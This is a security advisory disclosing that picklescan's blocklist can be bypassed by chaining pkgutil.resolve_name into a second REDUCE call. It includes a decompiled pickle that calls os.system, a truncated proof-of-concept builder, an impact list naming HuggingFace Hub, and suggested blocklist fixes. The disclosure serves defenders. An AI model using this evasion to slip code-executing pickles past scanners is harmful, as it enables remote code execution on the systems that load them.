Security controls bypass or absence In picklescan

Description

PickleScan's pkgutil.resolve_name has a universal blocklist bypass

Summary

pkgutil.resolve_name() is a Python stdlib function that resolves any "module:attribute" string to the corresponding Python object at runtime. By using pkgutil.resolve_name as the first REDUCE call in a pickle, an attacker can obtain a reference to ANY blocked function (e.g., os.system, builtins.exec, subprocess.call) without that function appearing in the pickle's opcodes. picklescan only sees pkgutil.resolve_name (which is not blocked) and misses the actual dangerous function entirely.

This defeats picklescan's entire blocklist concept — every single entry in _unsafe_globals can be bypassed.

Severity

Critical (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.

Affected Versions

    picklescan <= 1.0.3 (all versions including latest)

Details

How It Works

A pickle file uses two chained REDUCE calls:

1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE

picklescan's opcode scanner sees:

    STACK_GLOBAL with module=pkgutil, name=resolve_nameNOT in blocklist → CLEAN

    The second REDUCE operates on a stack value (the return of the first call), not on a global import → invisible to scanner

The string "os:system" is just data (a SHORT_BINUNICODE argument to the first REDUCE) — picklescan does not analyze REDUCE arguments, only GLOBAL/INST/STACK_GLOBAL references.

Decompiled Pickle (what the data actually does)

from pkgutil import resolve_name
_var0 = resolve_name('os:system')          # Returns the actual os.system function
_var1 = _var0('malicious_command')          # Calls os.system('malicious_command')
result = _var1

Confirmed Bypass Targets

Every entry in picklescan's blocklist can be reached via resolve_name:

Chain
Resolves To
Confirmed RCE
picklescan Result

Total: 11+ confirmed RCE chains, all reporting CLEAN.

Proof of Concept

import struct, io, pickle

def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

# resolve_name("os:system")("id")
payload = (...

Why pkgutil Is Not Blocked

picklescan's _unsafe_globals (v1.0.3) does not include pkgutil. The module is a standard import utility — its primary purpose is module/package resolution. However, resolve_name() can resolve ANY attribute from ANY module, making it a universal gadget.

Note: fickling DOES block pkgutil in its UNSAFE_IMPORTS list.

Impact

This is a complete bypass of picklescan's security model. The entire blocklist — every module and function entry in _unsafe_globals — is rendered ineffective. An attacker needs only use pkgutil.resolve_name as an indirection layer to call any Python function.

This affects:

    HuggingFace Hub (uses picklescan)

    Any ML pipeline using picklescan for safety validation

    Any system relying on picklescan's blocklist to prevent malicious pickle execution

Suggested Fix

    Immediate: Add pkgutil to _unsafe_globals:

    "pkgutil": {"resolve_name"},
    

    Also block similar resolution functions:

    "importlib": "*",
    "importlib.util": "*",
    

    Architectural: The blocklist approach cannot defend against indirect resolution gadgets. Even blocking pkgutil, an attacker could find other stdlib functions that resolve module attributes. Consider:

      Analyzing REDUCE arguments for suspicious strings (e.g., patterns matching "module:function")

      Treating unknown globals as dangerous by default

      Switching to an allowlist model

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions